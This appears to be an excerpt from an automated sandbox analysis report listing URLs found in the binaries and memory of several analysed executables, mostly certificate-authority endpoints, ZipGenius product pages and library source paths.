              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/Sectig
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmp, FloydMounts.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cscasha2.ocsp-certum.com04
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://downloads.zipgenius.it
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://downloads.zipgenius.itopenU
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://faq.zipgenius.com/
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://faq.zipgenius.it/
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://forum.wininizio.it
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://forum.zipgenius.it
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://forum.zipgenius.itopenU
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://help.zipgenius.com
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://help.zipgenius.com/
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://help.zipgenius.it
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://help.zipgenius.it/
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://help.zipgenius.itU
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://italian.wunderground.com/global/stations/16332.html
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://italian.wunderground.com/global/stations/16422.html
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://italian.wunderground.com/global/stations/16422.htmlopenhttp://italian.wunderground.com/global
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://members.home.nl/rtimmermans/
              Source: FloydMounts.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: FloydMounts.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: FloydMounts.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmp, FloydMounts.exeString found in binary or memory: http://ocsp.sectigo.com0
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://pcpro.mondadori.com)
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/cscasha2.cer0
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
              Source: FloydMounts.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
              Source: FloydMounts.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://skin.zipgenius.it
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://skin.zipgenius.itopenU
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://version.zipgenius.it
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://volftp.tiscali.it)
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.7-zip.org
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.7-zip.org)
              Source: Produces.com, 0000000B.00000000.1689779944.0000000000285000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.certum.pl/CPS0
              Source: is-PGV92.tmp.20.drString found in binary or memory: http://www.componentace.com
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.cyberotecnica.net)
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.000000004A601000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.drbob42.com
              Source: is-PGV92.tmp.20.drString found in binary or memory: http://www.google.com/search?sourceid=ZG6&q=%22
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.ilsoftware.it)
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005DBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.programmiamo.net)
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.quickzip.org
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.reggiocal.it
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.snapfiles.com)
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.themexp.org
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.themexp.orgopenU
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.virusportal.com/com/virusinfo/encyclopedia/results.aspx?term=
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.wininizio.it
              Source: ulu_mon.exe, 0000002F.00000002.3174780608.0000000010C5B000.00000004.00000020.00020000.00000000.sdmp, ulu_mon.exe, 0000002F.00000000.3084576961.000000000105E000.00000002.00000001.01000000.0000000D.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.winmagazine.it)
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.com/
              Source: is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.com/index.php?id=94
              Source: is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.it
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.it/
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.it/U
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.it/zg5/addon/HiColSFX.exe
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.it/zg5/addon/HiColSFX.exeopenU
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.it/zg5/external_app.htm
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.it/zg5/external_app.htmopenU
              Source: ulu_mon.exe, 0000002F.00000000.3082301174.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, ulu_mon.exe, 0000002F.00000002.3174780608.0000000010015000.00000004.00000020.00020000.00000000.sdmp, is-PGV92.tmp.20.drString found in binary or memory: http://www.zipgenius.itopenU
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: ulu_mon.exe, 0000002F.00000002.3162136925.0000000005F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/Jcl8087.pas
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclAnsiStri
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclBase.pas
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclCharsets
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclCompress
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclDateTime
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclFileUtil
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclIniFiles
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclLogic.pa
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclMath.pas
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclMime.pas
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclRTTI.pas
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclResource
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSimpleXm
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclStreams.
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclStringCo
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclStrings.
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSynch.pa
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSysInfo.
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclSysUtils
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclUnicode.
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclUnitVers
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/JclWideStri
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/bzip2.pas
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/common/zlibh.pas
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclAppInst
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclConsole
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclRegistr
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclSecurit
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclShell.p
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/JclWin32.p
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/Snmp.pas
              Source: is-PGV92.tmp.20.drString found in binary or memory: https://jcl.svn.sourceforge.net:443/svnroot/jcl/tags/JCL-2.2-Build3845/jcl/source/windows/sevenzip.p
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org/
              Source: X4PCDQPDT1B8IDPB7SN83.exe, 00000011.00000000.2547757785.00000000002C1000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
              Source: X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2569814319.0000000001030000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000012.00000003.2563365682.0000000003830000.00000004.00001000.00020000.00000000.sdmp, X4PCDQPDT1B8IDPB7SN83.tmp, 00000014.00000003.3093420378.0000000002630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://jrsoftware.org0
